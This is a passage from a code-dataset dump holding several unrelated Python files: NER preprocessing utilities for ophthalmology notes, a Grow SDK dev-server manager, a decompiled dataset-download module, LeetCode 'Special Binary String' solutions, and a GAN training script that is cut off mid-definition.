{find_middle(node1).value}\")\r\n","sub_path":"linked_list/llmiddle.py","file_name":"llmiddle.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472155401","text":"import pandas as pd\nimport re \nfrom nltk.tokenize.treebank import TreebankWordTokenizer\nimport numpy as np\nimport ast\nimport string \nimport math\nimport torch \nimport json \n\n#logging function \ndef MyLogger(output_file_path): \n import logging \n import sys\n logger=logging.getLogger() \n logger.setLevel(logging.DEBUG)\n output_file_handler=logging.FileHandler(output_file_path, mode='w')\n stdout_handler=logging.StreamHandler(sys.stdout) \n\n logger.addHandler(output_file_handler) \n logger.addHandler(stdout_handler) \n return logger \n\n##turns the oph-ner-preprocess02-tokenizeandlabel.ipynb util functiosn into a script\n\nclass OphNERDataset(torch.utils.data.Dataset):\n def __init__(self, encodings, labels):\n self.encodings = encodings\n self.labels = labels\n\n def __getitem__(self, idx):\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n item['labels'] = torch.tensor(self.labels[idx])\n return item\n\n def __len__(self):\n return len(self.labels)\n\n##Preprocessing Utils\n\ndef gettokenspanlist(note): \n t = TreebankWordTokenizer()\n tokenspanlist=list(t.span_tokenize(note))\n return tokenspanlist\n \n#find the visual acuity portion of the note \ndef findvaheader(note): \n regex=re.compile(r\"(?i)Visual\\sAcuity[:]?\")\n vaspanlist=[]\n for m in regex.finditer(note): \n vaspanlist.append((m.start(), m.end()))\n try: return vaspanlist[0][0]\n except: return 0\n \ndef findsleheader(note): \n regex=re.compile(r\"(?i)S(lit)?(\\s|-)?L(amp)?(\\s?E(xam)?)?(\\s|:|-)\")\n slespanlist=[]\n for m in regex.finditer(note): \n slespanlist.append((m.start(), m.end()))\n try: return slespanlist[-1][0]\n except: return 0\n \ndef findextheader(note): \n regex=re.compile(r\"(?i)External\")\n extspanlist=[]\n for m in regex.finditer(note): \n extspanlist.append((m.start(), m.end()))\n try: return extspanlist[0][0]\n except: return 0\n\ndef findllheader(note): \n regex=re.compile(r\"(?i)((l(ids)?\\s?(\\/|&|(\\sand\\s))\\s?l(ashes)?))\") \n llspanlist=[]\n for m in regex.finditer(note): \n llspanlist.append((m.start(), m.end()))\n try: return llspanlist[0][0]\n except: return 0\n \n#build function that turns cell into a regex and searches text for it, returning the span of the match \ndef findlabel(regextext, note): \n spanlist=[]\n sleposition = findsleheader(note) \n vaposition = findvaheader(note) \n llposition = findllheader(note)\n startposition = max(sleposition, vaposition, llposition)\n try: \n regextext=str.strip(regextext)\n regex=re.compile(re.escape(\" \"+regextext)) #regex escape? \n except: \n return []\n for m in regex.finditer(note): \n if m.start()+1 >= startposition: \n spanlist.append((m.start()+1, m.end()))\n return spanlist \n \n\n#now we have to match the spans to actual locations of the tokens \n#what do we want to return? the index of the token which starts the match, and the indices of the subsequent tokens\n#version 2, what is the beginning and end of the spanlist doesn't match the begin and end of a token\ndef findmatchingtoken(tokenspanlist, spanlist): \n '''\n inputs: \n tokenlist: a list of span tuples identifying start and ends of tokens\n spanlist: a list of span tuples identifying starts and ends of matches. \n Each tuple could span multiple tokens. Could be multiple tuples indicating multiple matches. \n \n returns: \n a list of tuples indicating start and end indices for matches?\n '''\n \n matchindexlist=[]\n if len(spanlist)==0: \n return []\n else: \n for match in spanlist: \n matchbeg=match[0]\n matchend=match[1]\n #search for match beginning \n for i in range(len(tokenspanlist)): \n tokenspan=tokenspanlist[i]\n if tokenspan[0] <= matchbeg <= tokenspan[1]: \n #save the beginning of the token here \n begindex=i\n #search for match end (starting with match beginning): \n j=begindex\n while j < len(tokenspanlist): \n tokenspan=tokenspanlist[j]\n if tokenspan[0] <= matchend <= tokenspan[1]: \n #save the end of the token here \n endindex=j\n break #stop searching if beg and end found \n j=j+1\n try: \n matchindexlist.append((begindex,endindex))\n except: \n print(match, tokenspanlist)\n if len(matchindexlist)==0: \n return []\n else: return matchindexlist\n \n\n#then given a series of indices which have matches, return the whole sequence of labels\n#how to resolve conflicts? one token span might match more than one label \n#simple version may not do any significant conflict resolution - i.e., pick a random version that works \ndef returnlabels(matchindexlist, tokenlistlabels, name): \n '''\n inputs: \n matchindexlist: a list of indices which match the named entity \n tokenlistlabels: a list of labels (in progress) which need to be labeled with the match \n name: the name of the entity type \n '''\n if len(matchindexlist)>0: \n for match in matchindexlist:\n matchstart=match[0]\n matchend=match[1]\n if tokenlistlabels[matchstart]=='O': #if first available match is \"free\" or unassigned\n tokenlistlabels[matchstart]='B-'+name #label entity start \n if matchend>matchstart: #for multiple token matches, label entity continuation \n for i in range(matchstart+1, matchend+1): \n tokenlistlabels[i]='I-'+name\n break \n else: #if first available match is already assigned, go to the next one \n continue \n return tokenlistlabels \n\ndef initializetokenlistlabels(tokenspanlist): \n tokenlistlabels=['O']*len(tokenspanlist)\n return tokenlistlabels \n \ndef gettokenlistlength(tokenspanlist):\n tokenspanlist=ast.literal_eval(tokenspanlist)\n return len(tokenspanlist)\n \ndef checkfornomatches(doclength, tokenlistlabels): \n tokenlistlabels=ast.literal_eval(tokenlistlabels)\n if tokenlistlabels == [\"O\"]*doclength: \n return True \n else: \n return False \n \ndef countmatches(tokenlistlabels): \n tokenlistlabels=ast.literal_eval(tokenlistlabels)\n return sum('B-' in s for s in tokenlistlabels)\n \n#split long documents into shorter ones of specified size \n#ready to input into sklearn train_test_split for dev splitting off \ndef splitdoc(tokenlist, tokenlistlabels, size=256):\n '''\n inputs: \n tokenlist: a list of list of tokens for the documents\n tokenlistlabels: a corresponding list of list of token labels for the documents \n \n returns: \n list of lists containing the tokens, as well as a list of lists containing the tags\n ready \n n.b. In the end we will treat each subdocument as an independent document \n\n '''\n #master lists of lists of tokens and tags \n tokens=[]\n tags=[]\n \n #iterate through each document \n for i in range(len(tokenlist)): \n doc=tokenlist[i]\n labels=tokenlistlabels[i]\n #split up each doc into a list of lists of tokens and tags \n tokenlistbroken=[doc[x:x+size] for x in range(0, len(doc), size)]\n taglistbroken=[labels[x:x+size] for x in range(0, len(labels), size)]\n #tack on the lists of lists into the master lists of lists\n tokens.extend(tokenlistbroken)\n tags.extend(taglistbroken)\n \n return tokens, tags\n\n#propagate labels through a document through its word pieces \ndef fill_labels(doc_labels, doc_offset): \n '''\n inputs: \n encoding offset array for a document (after it passed through Bert WordPieceTokenizer)\n original labels for that document \n outputs: \n new set of labels for the WordPieced document, \n consisting of original labels propagated from head of word to rest of word as appropriate\n '''\n arr_offset = np.array(doc_offset) #turns the list of tuples into an array, 512 rows by 2 columns\n df=pd.DataFrame(data=arr_offset, columns=[\"offset0\", \"offset1\"])\n\n # set labels whose first offset position is 0 and the second is not 0, which means its the first subpart of a word\n selected_label_idx=(arr_offset[:,0] == 0) & (arr_offset[:,1] != 0)\n num_selected_labels=selected_label_idx.sum()\n #sometimes i have too many doc_labels for token heads, which I think happens when the doc gets truncated \n #thus num_selected_labels tells me how many labels i need from the doc_labels \n\n #initialize labels with Nan's \n df[\"labels\"]=np.nan\n #fill selected labels corresponding to wordpiece heads with the original labels \n df.loc[selected_label_idx, \"labels\"] = doc_labels[0:num_selected_labels]\n #special tokens are filled in as 0 \n df.loc[(df[\"offset0\"]==0) & (df[\"offset1\"]==0), \"labels\"]=0\n #the only remaining tokens without labels are word pieces that don't start words\n #we fill those from the previous labels \n #select rows that are odd (start tokens for entities) \n startlabelidx=df.loc[(df[\"labels\"] % 2 == 1)].index\n #select the following row but only if it needs filling \n requiresfillidx=df.loc[startlabelidx+1, \"labels\"][df[\"labels\"].isnull()].index\n #fill it with the prior row's values +1 (because it will be a \"continue\" token corresponding to prior start token)\n df.loc[requiresfillidx, \"labels\"]=list(df.loc[requiresfillidx-1, 'labels']+1)\n #now the only missing labels follow even numbers, so use usual ffill method.\n df.ffill(inplace=True)\n return list(df[\"labels\"].astype(int))\n \n#iterate through documents to propagate labels \ndef encode_tags(tags, encodings, tag2id):\n #turns the labels into a list of lists of tag-id's \n labels = [[tag2id[tag] for tag in doc] for doc in tags]\n encoded_labels = []\n #iterate through each document's labels and offset mapping\n i=0\n for doc_labels, doc_offset in zip(labels, encodings.offset_mapping):\n if i%10000==0: \n print(\"processing subdocument\", i) \n encoded_labels.append(fill_labels(doc_labels, doc_offset))\n i=i+1\n return encoded_labels\n \ndef remove_unicode_specials(inputstring):\n newstring=inputstring.replace(\"\\uFFFD\", \"\")\n return newstring\n\n\n#helper functions to do inference and export results to prodigy\ndef singledocinference(doc, classifier, inferenceid2tag): \n '''runs a single document through inference and processes the output dictionary to work for prodigy''' \n pipelineoutput=classifier(doc)\n docdict={} \n docdict[\"text\"]=doc\n spanlist=[] \n for dictionary in pipelineoutput:\n dictionary[\"start\"]=int(dictionary[\"start\"])\n dictionary[\"end\"]=int(dictionary[\"end\"])\n dictionary.pop('score', None)\n dictionary.pop('word', None)\n dictionary[\"label\"]=inferenceid2tag[dictionary['entity']]\n dictionary.pop(\"entity\")\n spanlist.append(dictionary)\n docdict[\"spans\"]=spanlist\n return docdict \n \ndef multipledocinference(doclist, classifier, outputjsonpath, inferenceid2tag): \n '''Calls singledoc inference multiple times, to do multiple doc inference, \n and saves multiline jsonl filepath for prodigy'''\n docdictlist=[]\n for doc in doclist: \n docdict=singledocinference(doc, classifier, inferenceid2tag)\n #print(docdict)\n docdictlist.append(docdict)\n print('saving jsonl file to ', outputjsonpath)\n with open(outputjsonpath, 'w') as f:\n for item in docdictlist:\n f.write(json.dumps(item) + \"\\n\")\n\ndef select_longest_regex_finding(regex_one, regex_two, note):\n \"\"\"\n Return the longest regex match of the first finding of regex in note.\n\n Parameters\n regex_one: str, regular expression to search through note.\n regex_two: str, regular expression to search through note if we don't find any matches for regex_one.\n note: str, string to be searched through with regex.\n\n Returns\n str, longest regex match of the first finding of regex in note. If no\n regex matches are found, returns None.\n \"\"\"\n if (regex_one != None and note != None):\n findings = re.findall(regex_one, note, flags=re.IGNORECASE)\n if (len(findings) > 0):\n return max(findings[0], key=len)\n else:\n if (regex_two != None):\n findings = re.findall(regex_two, note, flags=re.IGNORECASE)\n if (len(findings) > 0):\n return max(findings[0], key=len)\n else:\n return None\n else:\n return None\n\n\ndef find_sandwiched_regex_finding_indices(regex_curr, regex_next, note, final_entity_width):\n \"\"\"\n Searches 'note' for the longest regex match of the regular expression\n regex_curr, and the longest regex match of regex_next that occurs after\n regex_curr's match. Returns the end index of regex_curr's match and\n the start index of regex_next's match. If \n regex_next is set to None, returns the content after regex_curr's match\n to the end of note.\n \n Parameters\n regex_curr: str, a regular expression to search through the note\n regex_next: str, a regular expression to search through the note, or None\n if we want to search to the end of the note.\n note: str, a string that will be searched using the two regexes\n final_entity_width: int, specifying how many characters should be in the final entity\n\n Returns:\n int, int: index of the end of the longset regex match of regex_curr,\n index of the start of the longest regex match of regex_next after\n the end of regex_curr's match.\n \"\"\"\n if (regex_curr != None and note != None):\n curr_findings = re.findall(regex_curr, note, flags=re.IGNORECASE)\n\n # Only proceed if we find regex matches\n if (len(curr_findings) > 0):\n # re.findall sometimes returns lists of strings, sometimes lists of tuples\n if (isinstance(curr_findings[0], str)):\n curr_heading = max(curr_findings, key=len)\n else:\n curr_heading = max(curr_findings[0], key=len)\n curr_heading_end_ind = note.index(curr_heading) + len(curr_heading)\n\n updated_note = remove_longest_regex_finding(regex_curr, note)\n\n # If regex_next != None, we are going to find the sandwiched finding\n if (regex_next != None):\n next_findings = re.findall(regex_next, updated_note, flags=re.IGNORECASE)\n\n if (len(next_findings) > 0):\n if (isinstance(next_findings[0], str)):\n next_heading = max(next_findings, key=len)\n else:\n next_heading = max(next_findings[0], key=len)\n next_heading_start_ind = curr_heading_end_ind + updated_note.index(next_heading)\n else:\n next_heading_start_ind = len(note)\n # if regex_next == None, we return the text up to the end of the note\n else:\n next_heading_start_ind = curr_heading_end_ind + final_entity_width\n\n return curr_heading_end_ind, next_heading_start_ind\n \n return None, None\n\n\ndef select_sandwiched_regex_finding(regex_curr, regex_next, note, final_entity_width):\n \"\"\"\n Searches 'note' for the longest regex match of the regular expression\n regex_curr, and the lognest regex match of regex_next that occurs after\n regex_curr's match. Returns the content between the two matches. If \n regex_next is set to None, returns the content after regex_curr's match\n to the end of note.\n \n Parameters\n regex_curr: str, a regular expression to search through the note\n regex_next: str, a regular expression to search through the note\n note: str, a string that will be searched using the two regexes\n final_entity_width: int, specifying how many characters should be in the final entity\n\n Returns:\n str, text between the longest regex matches of regex_curr and regex_next.\n If regex_next is None, returns the text from the end of regex_curr's match\n to the end of the string.\n \"\"\"\n curr_heading_end_ind, next_heading_start_ind = find_sandwiched_regex_finding_indices(regex_curr, regex_next, note, final_entity_width)\n if (curr_heading_end_ind != None and next_heading_start_ind != None):\n finding = note[curr_heading_end_ind:next_heading_start_ind]\n if (finding.isspace()):\n return None\n return finding \n return None\n\ndef remove_sandwiched_regex_finding(regex_curr, regex_next, note, final_entity_width):\n \"\"\"\n Searches 'note' for the longest regex match of the regular expression\n regex_curr, and the lognest regex match of regex_next that occurs after\n regex_curr's match. Returns the content from the start of regex_next's match\n onwards.\n \n Parameters\n regex_curr: str, a regular expression to search through the note\n regex_next: str, a regular expression to search through the note\n note: str, a string that will be searched using the two regexes\n final_entity_width: int, specifying how many characters should be in the final entity\n\n Returns:\n str, text after longest regex match of regex_next\n \"\"\"\n curr_heading_end_ind, next_heading_start_ind = find_sandwiched_regex_finding_indices(regex_curr, regex_next, note, final_entity_width)\n if (curr_heading_end_ind != None and next_heading_start_ind != None):\n finding = note[next_heading_start_ind:]\n return finding \n return None\n\ndef remove_longest_regex_finding(regex, note):\n \"\"\"\n Finds the longest match of 'regex' within 'note', and returns a modified\n version of 'note' with the sequence before and including the longest match\n removed.\n\n Parameters:\n - regex: str, a regular expression to search through note\n - note: str, a string that will be searched using regex\n\n Returns:\n - str, version of note with text up to and including the longest regex match\n removed. If no regex match is found, this returns note.\n \"\"\"\n if (regex != None and note != None):\n findings = re.findall(regex, note, flags=re.IGNORECASE)\n if (len(findings) > 0):\n if (isinstance(findings[0], str)):\n longest_finding = max(findings, key=len)\n else:\n longest_finding = max(findings[0], key=len) \n longest_match_len = len(longest_finding)\n if (longest_match_len > 0):\n start_ind = note.index(longest_finding)\n end_ind = start_ind + longest_match_len\n return note[end_ind:]\n else:\n return note\n return note\n\n#build function that turns cell into a regex and searches text for it, returning the span of the match \ndef findoffsetlabel(regextext, note, offset): \n spanlist=[]\n if ((note != None) and len(note) > 0):\n try: \n regextext=str.strip(regextext)\n regex=re.compile(re.escape(\" \"+regextext)) #regex escape? \n except: \n return []\n for m in regex.finditer(note): \n spanlist.append((m.start()+1+offset, m.end()+offset))\n return spanlist \n\n\ndef defaultlabels(doclength): \n return '['+int(doclength)*\"'O',\"+']'","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"489252841","text":"import logging\nlogging.basicConfig(level=logging.INFO, format='%(message)s')\n\nfrom grow.common import utils\nfrom grow.pods.preprocessors import translation as translation_preprocessor\nfrom grow.pods.preprocessors.file_watchers import file_watchers\nfrom grow.server import handlers\nfrom grow.server import main as main_lib\nfrom wsgiref import simple_server\nimport atexit\nimport multiprocessing\nimport os\nimport sys\nimport threading\nimport yaml\nimport webbrowser\n\n_servers = {}\n_config_path = '{}/.grow/servers.yaml'.format(os.environ['HOME'])\n\n\ndef _loop_watching_for_changes(pod, file_watchers_to_preprocessors, quit_event):\n while not quit_event.is_set():\n for file_watcher, preprocessors in file_watchers_to_preprocessors.iteritems():\n if file_watcher.has_changes():\n [preprocessor.run() for preprocessor in preprocessors]\n quit_event.wait(timeout=1.5)\n\n\ndef _start(pod, host=None, port=None, open_browser=False):\n root = pod.root\n preprocessors = pod.list_preprocessors()\n\n # Add the translation preprocessor as a builtin.\n preprocessors.insert(0, translation_preprocessor.TranslationPreprocessor(pod=pod))\n\n try:\n # TODO(jeremydw): Custom server logs.\n # logger_format = ('[%(time)s] \"%(REQUEST_METHOD)s %(REQUEST_URI)s\" %(status)s'\n # if use_simple_log_format else None)\n\n # Map directory names to preprocessors.\n dirs_to_preprocessors = {}\n for preprocessor in preprocessors:\n for watched_dir in preprocessor.list_watched_dirs():\n if watched_dir not in dirs_to_preprocessors:\n dirs_to_preprocessors[watched_dir] = []\n dirs_to_preprocessors[watched_dir].append(preprocessor)\n\n # Run all preprocessors for the pod.\n [preprocessor.first_run() for preprocessor in preprocessors]\n\n # Create file watchers for each preprocessor.\n file_watchers_to_preprocessors = {}\n for dirname, preprocessors in dirs_to_preprocessors.iteritems():\n dirname = os.path.join(pod.root, dirname.lstrip('/'))\n change_watcher = file_watchers.get_file_watcher([dirname])\n change_watcher.start()\n file_watchers_to_preprocessors[change_watcher] = preprocessors\n\n # Start a thread where preprocessors can run if there are changes.\n quit_event = threading.Event()\n change_watcher_thread = threading.Thread(\n target=_loop_watching_for_changes,\n args=(pod, file_watchers_to_preprocessors, quit_event))\n change_watcher_thread.start()\n\n # Create the development server.\n root = os.path.abspath(os.path.normpath(root))\n handlers.set_pod_root(root)\n app = main_lib.application\n port = 8080 if port is None else port\n host = 'localhost' if host is None else host\n httpd = simple_server.make_server(host, int(port), app)\n except:\n logging.exception('Failed to start server.')\n quit_event.set()\n change_watcher_thread.join()\n sys.exit()\n\n try:\n root_path = pod.get_root_path()\n url = 'http://{}:{}{}'.format(host, port, root_path)\n logging.info('---')\n logging.info(utils.colorize('{blue}The Grow SDK is experimental.{/blue} Expect backwards incompatibility until v0.1.0.'))\n logging.info('Thank you for testing and contributing! Visit http://growsdk.org for resources.')\n logging.info('---')\n logging.info('Serving pod {} => {}'.format(root, url))\n text = '{green}READY!{/green} Press Ctrl+C to shut down. Tip: Use --open to open a browser automatically.'\n logging.info(utils.colorize(text))\n\n def start_browser(server_ready_event):\n server_ready_event.wait()\n if open_browser:\n webbrowser.open(url)\n\n server_ready_event = threading.Event()\n browser_thread = threading.Thread(target=start_browser, args=(server_ready_event,))\n browser_thread.start()\n server_ready_event.set()\n httpd.serve_forever()\n browser_thread.join()\n\n except KeyboardInterrupt:\n logging.info('Shutting down...')\n httpd.server_close()\n\n # Clean up once serve exits.\n quit_event.set()\n change_watcher_thread.join()\n sys.exit()\n\n\ndef start(pod, host=None, port=None, open_browser=False, use_subprocess=False):\n root = pod.root\n if root in _servers:\n logging.error('Server already started for pod: {}'.format(root))\n return\n\n if not use_subprocess:\n _start(pod, host=host, port=port, open_browser=open_browser)\n return\n\n server_process = multiprocessing.Process(target=_start, args=(root, host, port, open_browser))\n server_process.start()\n _servers[root] = server_process\n return server_process\n\n\ndef stop(root):\n process = _servers.pop(root, None)\n if process is None:\n return\n try:\n process.terminate()\n logging.info('Stopped server for pod: {}'.format(root))\n except AttributeError:\n logging.info('Server already stopped for pod: {}'.format(root))\n\n\n@atexit.register\ndef stop_all():\n for root in _servers.keys():\n stop(root)\n\n\ndef write_config(config):\n path = os.path.dirname(_config_path)\n if not os.path.exists(path):\n os.makedirs(path)\n content = yaml.dump(config, default_flow_style=False)\n fp = open(_config_path, 'w')\n fp.write(content)\n fp.close()\n\n\nclass PodServer(object):\n\n def __init__(self, root, port=8000, revision_status=None):\n self.root = root\n self.port = port\n self.revision_status = revision_status\n self.server_status = 'off'\n self._process = None\n\n def start(self):\n self._process = start(self.root, port=self.port, use_subprocess=True)\n self.server_status = 'on'\n logging.info('Started server for pod: {}'.format(self.root))\n\n def stop(self):\n self.server_status = 'off'\n try:\n self._process.terminate()\n logging.info('Stopped server for pod: {}'.format(self.root))\n except AttributeError:\n logging.info('Server already stopped.')\n\n def set_root(self, root):\n self.root = root\n\n def set_port(self, port):\n self.port = port\n\n @property\n def is_started(self):\n return self.server_status == 'on'\n\n @classmethod\n def load(cls):\n servers = []\n try:\n fp = open(_config_path)\n for server in yaml.load(fp)['servers']:\n servers.append(cls(\n server['root'],\n port=server.get('port'),\n revision_status=server.get('revision_status')\n ))\n except IOError:\n # .grow/servers.yaml does not exist.\n pass\n return servers\n","sub_path":"grow/server/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":6313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"245561056","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /root/project/datamaestro/download/single.py\n# Compiled at: 2020-02-25 07:34:23\n# Size of source mod 2**32: 3689 bytes\nimport logging, shutil, tarfile, io, tempfile, gzip\nimport os.path as op\nimport os, urllib3\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\nimport re\nfrom docstring_parser import parse\nfrom datamaestro.utils import rm_rf\nfrom datamaestro.stream import Transform\nfrom datamaestro.download import Download\n\ndef open_ext(*args, **kwargs):\n \"\"\"Opens a file according to its extension\"\"\"\n name = args[0]\n if name.endswith('.gz'):\n return (gzip.open)(*args, *kwargs)\n return (io.open)(*args, **kwargs)\n\n\nclass SingleDownload(Download):\n\n def __init__(self, filename):\n super().__init__(re.sub('\\\\..*$', '', filename))\n self.name = filename\n\n @property\n def path(self):\n return self.definition.datapath / self.name\n\n def prepare(self):\n return self.path\n\n def download(self, force=False):\n if not self.path.is_file():\n self._download(self.path)\n\n\nclass filedownloader(SingleDownload):\n\n def __init__(self, filename, url, transforms=None):\n \"\"\"Downloads a file given by a URL\n\n Args:\n filename: The filename within the data folder; the variable name corresponds to the filename without the extension\n url: The URL to download\n transforms: Transform the file before storing it\n \"\"\"\n super().__init__(filename)\n self.url = url\n p = urllib3.util.parse_url(self.url)\n path = Path(Path(p.path).name)\n self.transforms = transforms if transforms else Transform.createFromPath(path)\n\n def _download(self, destination):\n logging.info('Downloading %s into %s', self.url, destination)\n dir = op.dirname(destination)\n os.makedirs(dir, exist_ok=True)\n with self.context.downloadURL(self.url) as (file):\n if self.transforms:\n logging.info('Transforming file')\n with self.transforms(file.path.open('rb')) as (stream):\n with destination.open('wb') as (out):\n shutil.copyfileobj(stream, out)\n else:\n logging.info('Keeping original downloaded file %s', file.path)\n (shutil.copy if file.keep else shutil.move)(file.path, destination)\n logging.info('Created file %s' % destination)\n\n\nclass concatdownload(SingleDownload):\n __doc__ = 'Concatenate all files in an archive'\n\n def __init__(self, filename, url, transforms=None):\n \"\"\"Concat the files in an archive\n\n Args:\n filename: The filename within the data folder; the variable name corresponds to the filename without the extension\n url: The URL to download\n transforms: Transform the file before storing it\n \"\"\"\n super().__init__(filename)\n self.url = url\n self.transforms = transforms\n\n def _download(self, destination):\n with self.context.downloadURL(self.url) as (dl):\n with tarfile.open(dl.path) as (archive):\n destination.parent.mkdir(parents=True, exist_ok=True)\n with open(destination, 'wb') as (out):\n for tarinfo in archive:\n if tarinfo.isreg():\n transforms = self.transforms or Transform.createFromPath(Path(tarinfo.name))\n logging.debug('Processing file %s', tarinfo.name)\n with transforms(archive.fileobject(archive, tarinfo)) as (fp):\n shutil.copyfileobj(fp, out)","sub_path":"pycfiles/datamaestro-0.6.13-py3-none-any/single.cpython-37.py","file_name":"single.cpython-37.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"345347373","text":"# 761. Special Binary String\n\n# Special binary strings are binary strings with the following two properties:\n\n# The number of 0's is equal to the number of 1's.\n# Every prefix of the binary string has at least as many 1's as 0's.\n# Given a special string S, a move consists of choosing two consecutive,\n# non-empty, special substrings of S, and swapping them.\n\n# (Two strings are consecutive if the last character of the first string\n# is exactly one index before the first character of the second string.)\n\n# At the end of any number of moves, what is the lexicographically largest resulting string possible?\n\n# Example 1:\n# Input: S = \"11011000\"\n# Output: \"11100100\"\n\n# Explanation:\n# The strings \"10\" [occuring at S[1]] and \"1100\" [at S[3]] are swapped.\n# This is the lexicographically largest string possible after some number of swaps.\n# Note:\n\n# S has length at most 50.\n# S is guaranteed to be a special binary string as defined above.\n\n\nclass MakeLargestSpecial:\n\n # Just 4 steps:\n\n # Split S into several special strings (as many as possible).\n # Special string starts with 1 and ends with 0. Recursion on the middle part.\n # Sort all special strings in lexicographically largest order.\n # Join and output all strings.\n # Updated:\n\n # The middle part of a special string may not be another special string. But in my recursion it is.\n # For example, 1M0 is a splitted special string. M is its middle part and it must be another special string.\n\n # Because:\n\n # The number of 0's is equal to the number of 1's in M\n # If there is a prefix P of Mwhich has one less 1's than 0's,\n # 1P will make up a special string. 1P will be found as special string before 1M0 in my solution.\n # It means that every prefix of M has at least as many 1's as 0's.\n # Based on 2 points above, M is a special string.\n\n def doit(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n def largestSpecialString(s):\n count, j = 0, 0\n res = []\n\n for i in range(len(s)):\n\n count += 1 if s[i] == '1' else -1\n if count == 0:\n res.append('1' + largestSpecialString(s[j+1:i]) + '0')\n j = i + 1\n\n return ''.join(sorted(res, reverse=1))\n\n return largestSpecialString(S)\n\n\nimport functools\n\nclass Solution:\n\n def compareTwoNumbers(self, num1, num2):\n if num2 + num1 > num1 + num2:\n return 1\n\n if num2 + num1 == num1 + num2:\n return 0\n\n return -1\n\n def makeLargestSpecial(self, s):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n\n if len(s) is 2:\n return s\n\n sum = 0\n start_index = 0\n substrings = []\n\n for index, c in enumerate(s):\n\n if c is '1':\n sum += 1\n else:\n sum -= 1\n\n if sum is 0:\n substrings.append(s[start_index: index + 1])\n start_index = index + 1\n\n if len(substrings) is 1:\n return \"1\" + self.makeLargestSpecial(substrings[0][1:-1]) + \"0\"\n\n else:\n results = []\n for sub in substrings:\n results.append(self.makeLargestSpecial(sub))\n\n sorted_nums = sorted(results, key=functools.cmp_to_key(self.compareTwoNumbers))\n result = ''\n\n for r in sorted_nums:\n result = result + r\n\n return result\n\n\nif __name__ == \"__main__\":\n\n res = MakeLargestSpecial().doit(\"11011000\")\n\n pass\n","sub_path":"PythonLeetcode/Leetcode/761_SpecialBinaryString.py","file_name":"761_SpecialBinaryString.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"590506616","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 27 11:26:58 2018\n\n@author: tinghaoli\n\"\"\"\n\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\n\nimport matplotlib.pyplot as plt\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchSize', type=int, default=10, help='input batch size')\nparser.add_argument('--imageSize', type=int, default=64, help='the height / width of the input image to network')\nparser.add_argument('--nz', type=int, default=3, help='size of the latent z vector')\nparser.add_argument('--ngf', type=int, default=64)\nparser.add_argument('--ndf', type=int, default=64)\nparser.add_argument('--niter', type=int, default=10, help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=0, help='number of GPUs to use')\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='', help=\"path to netD (to continue training)\")\nparser.add_argument('--outf', default='./output', help='folder to output images and model checkpoints')\nparser.add_argument('--manualSeed', type=int, help='manual seed')\n\nopt = parser.parse_args()\n\ntransform = transforms.Compose(\n [\n transforms.Resize((opt.imageSize,opt.imageSize)),\n #transforms.Grayscale(3),\n transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)),\n ])\n\ntrainset = dset.ImageFolder(root='/Users/tinghaoli/Desktop/Image', \n transform=transform)\n\nassert trainset\n\ndataloader = torch.utils.data.DataLoader(trainset, batch_size=opt.batchSize,\n shuffle=True, num_workers=2)\n\n\n\nfor i, data in enumerate(dataloader, 0):\n if i ==0:\n print(data)\n break\n \ndevice = torch.device(\"cuda:0\" if opt.cuda else \"cpu\")\nngpu = int(opt.ngpu)\nnz = int(opt.nz)\nngf = int(opt.ngf)\nndf = int(opt.ndf)\nnc = 3\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\nclass Generator(nn.Module):\n def __init__(self, ngpu):\n super(Generator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.Conv2d( nz, ngf * 8, 2, 1, 0, bias=True),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n # state size. (ngf*8) x 4 x 4\n nn.Conv2d(ngf * 8, ngf * 4, 2, 1, 1, bias=True),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # state size. (ngf*4) x 8 x 8\n nn.Conv2d(ngf * 4, ngf * 2, 2, 1, 0, bias=True),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 16 x 16\n# nn.Conv2d(ngf * 2, ngf, 2, 1, 1, bias=True),\n# nn.BatchNorm2d(ngf),\n# nn.ReLU(True),\n # state size. (ngf) x 32 x 32\n nn.Conv2d( ngf*2, nc, 2, 1, 1, bias=True),\n nn.Tanh()\n # state size. (nc) x 64 x 